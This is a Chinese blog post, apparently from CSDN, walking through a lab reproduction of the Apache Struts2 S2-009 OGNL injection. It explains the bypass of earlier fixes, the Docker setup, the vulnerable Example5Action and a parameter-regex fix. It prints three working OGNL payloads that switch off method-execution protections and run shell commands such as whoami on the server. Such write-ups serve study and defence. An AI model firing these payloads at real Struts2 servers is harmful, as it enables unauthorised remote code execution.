漏洞复现----31、Struts2/S2-009

已于 2022-05-30 15:43:29 修改
阅读量528 收藏 1
点赞数
分类专栏: # 漏洞复现 网络安全技术 文章标签: struts
于 2021-06-29 15:00:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/118334949
版权

文章目录

一、漏洞原理

Struts2对S2-003的修复方法是禁止静态方法调用,在s2-005中可直接通过OGNL绕过该限制,对于#号,同样使用编码\u0023或\43进行绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。

但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/helloword.acton?example=<OGNL statement>&(example)('xxx')=1的方法来执行它,从而绕过官方对#、\等特殊字符的防御。

ParametersInterceptor中的正则表达式将top [‘foo’](0)作为有效的表达式匹配,OGNL将其作为(top [‘foo’])(0)处理,并将“foo”操作参数的值作为OGNL表达式求值。这使得恶意用户将任意的OGNL语句放入由操作公开的任何String变量中,并将其评估为OGNL表达式,并且由于OGNL语句在 HTTP参数中,攻击者可以使用黑名单字符(例如#)禁用方法执行并执行任意方法,绕过ParametersInterceptor和OGNL库保护。

影响版本: 
2.1.0 - 2.3.1.1

二、环境搭建

docker-compose build
docker-compose up -d
访问:ip:8080

三、代码解释

在war包中找到:WEB-INF/src/java/org/apache/struts2/showcase/ajax/Example5Action.java

public class Example5Action extends ActionSupport {

    private static final long serialVersionUID = 2111967621952300611L;

    private String name;    
    private Integer age;


    public String getName() { return name; }      //获取name参数
    public void setName(String name) { this.name = name; }   //调用setName将name值赋给私有属性this.name

    public Integer getAge() { return age; }
    public void setAge(Integer age) { this.age = age; }

    @Override
    public String execute() throws Exception {
        return SUCCESS;
    }
}

WEB-INF/src/java/struts-ajax.xml查看URL路由:

<package name="ajax" extends="struts-default">
    ...
    <action name="example5" class="org.apache.struts2.showcase.ajax.Example5Action">
        <result name="input">/ajax/tabbedpanel/example5.jsp</result>
        <result>/ajax/tabbedpanel/example5Ok.jsp</result>
    </action>
    ...
</package>

name=example5,所以访问http://ip:8080/ajax/example5.action即可访问该控制器。将OGNL利用代码放在name参数里,访问该URL:

四、漏洞复现

4.1、利用一
POC:

GET /ajax/example5?age=123&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27whoami%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]

4.2、利用二

z[%28name%29%28%27meh%27%29]&age=123&name=(#context["xwork.MethodAccessor.denyMethodExecution"]=false,#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lan g.Runtime@getRuntime().exec('whoami').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new  java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#s=@org.apache.struts2.ServletActionContext@getResponse().get Writer(),#s.println(#d),#s.close())(meh)

4.3、利用三

GET /ajax/example5age=123&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27touch%20/tmp/success%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true

五、修复方法

1、在 struts.xml 中配置 ParametersIntercptor 以排除恶意参数

<interceptor-ref name="params"><font></font>

<param name="acceptParamNames">\w+((\.\w+)|(\[\d+\])|(\['\w+'\]))*</param><font></ </interceptor-ref><font></font>
参考链接:https://github.com/vulhub/
李沉肩
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 728
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架中ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
『Java安全』Struts 2.3.14.2 action占位符OGNL注入漏洞S2-015复现与浅析
Ho1aAs‘s Blog
08-29 959
action的name可以设置为*,当URL没有匹配到任何action的时候,就会匹配*对应的action;而一般开发中获取*对应的字符串,然后result返回以该字符串命名的jsp,获取该字符串用的是占位符{x},依照星号从左往右从1开始匹配例如:......
buuctf [struts2]s2-009
qq_1873822的博客
03-22 370
漏洞描述 这个漏洞s2-003 s2-005 属于一套的。 Struts2s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法
Struts2框架漏洞总结与复现(上) 含Struts2检测工具
剁椒鱼头没剁椒的博客
02-06 6921
如果在配置 Action 中 Result 时使用了重定向类型,并且还使用paramname作为重定向变量,UserAction中定义有一个name变量,当触发redirect类型返回时,Struts2获取使用{name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任何OGNL表达式导致命令执行。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。
给你汇报Struts2 S2-016漏洞修复的总结
HBohan的博客
06-27 1829
这篇文章主要介绍了Struts2 S2-016漏洞修复的总结,有需要的小伙伴可以进来参考下,来一起互相探讨一下哦 Struts2S2-016漏洞是之前比较重大的漏洞,也是一些老系统的历史遗留问题 此漏洞影响struts2.0-struts2.3的所有版本,可直接导致服务器被远程控制从而引起数据泄漏,影响巨大 漏洞修复总结有4种方式: 1、升级版本 这也是Apache官方给出的建议,把Struts2的版本升级到2.3.15以上的版本,这种方式只需要替换一些jar包,归纳如下: commons-lang3
Apache Struts2远程代码执行漏洞(S2-009)
weixin_47493074的博客
09-27 538
Apache Struts2远程代码执行漏洞(S2-009)
S2-016/017漏洞工具 struts漏洞
02-26
本工具可以详细测试S2-016/017漏洞的资源,有助于您更深层的了解struts!
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 Java 的 Web 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个漏洞存在于Struts2的Jakarta插件中,该插件处理HTTP请求头中的Content-Type字段时存在缺陷。攻击者可以通过精心构造的HTTP请求,...
Struts2 S2-009复现
ZJT6666666的博客
12-21 193
Struts2 S2-009复现
0x25. Apache Struts2远程代码执行漏洞(S2-009)复现
qq_31679787的博客
10-18 310
s2-009:OGNL提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。 在S2-003和S2-005中已经解决了类似的行为,但事实证明,基于列入可接受的参数名称的结果修复仅部分地关闭了该漏洞。 ParametersInterceptor中的正...
墨者Apache Struts2远程代码执行漏洞(S2-009)复现题解
zr1213159840的博客
01-15 738
一共提供了五个链接,每个都点击一下,发现第五个有点特别,点击进去,链接变成了 219.153.49.228:45832/ajax 查找漏洞相关的信息,找到一下链接: https://github.com/vulhub/vulhub/blob/master/struts2/s2-009/README.zh-cn.md 按照链接的指引,我们能找到这个下面还有个页面,访问如下地址: http://219.153.49.228:45832/ajax/example5.action 出现如下页面 接着就是找
墨者学院-Apache Struts2远程代码执行漏洞(S2-009)复现
JimWu的博客
09-04 1523
Apache Struts2远程代码执行漏洞(S2-009)复现 难易程度:★★ 题目类型:命令执行 使用工具:burpsuite、kali 漏洞原理:允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。 1.打开靶场,了解S2-009漏洞原理 2.构造poc,执行命令ls,查看文件。...
S2-009 远程代码执行漏洞
锋刃科技的博客
06-28 513
影响版本 2.1.0 - 2.3.1.1 环境搭建 cd vulhub/struts2/s2-009 docker-compose build && docker-compose up -d 访问http://your-ip:8080/ajax/example5.action http://yourIP:8080/ajax/example5.action 漏洞复现 http://yourIP:8080/ajax/example5.action?age=12313&amp
Apache Struts2远程代码执行漏洞(S2-009)复现总结
qq_45746681的博客
10-07 593
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、漏洞成因?二、复现1.环境搭建复现 前言 记录并复现下常见的struts2漏洞,加深理解 一、漏洞成因? 在修补了S2-003和S2-005之后,攻击者又发现了一种新的绕过ParametersInterceptor正则保护的攻击方式 当传入(ONGL)(1)时,会将前者视为ONGL表达式来执行,从而绕过了正则的匹配保护。而且由于其在HTTP参数值中,也可以进一步绕过字符串限制的保护 二、复现 1.环境搭建 因为墨者学院代币
Struts漏洞分析与研究
forbidd3n,keep going
10-13 2864
1. Apache官方公告 http://struts.apache.org/development/2.x/docs/security-bulletins.html 其中涉及代码执行的漏洞有:S2-003,S2-005,S2-007,S2-008,S2-009S2-012~S2-016,S2-20~21下面逐一简要说明。 2. 各版本漏洞分析 S2-003 受影响版本
Struts2漏洞分析与复现合集
未完成的歌~的博客
08-22 6506
原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/struts2/s2-001 运行以下命令进行设置 .............
s2-005漏洞复现
最新发布
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数名解析为OGNL表达式进行执行。攻击者可以通过编码绕过安全限制,执行恶意的代码。 该漏洞的影响版本是Struts ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值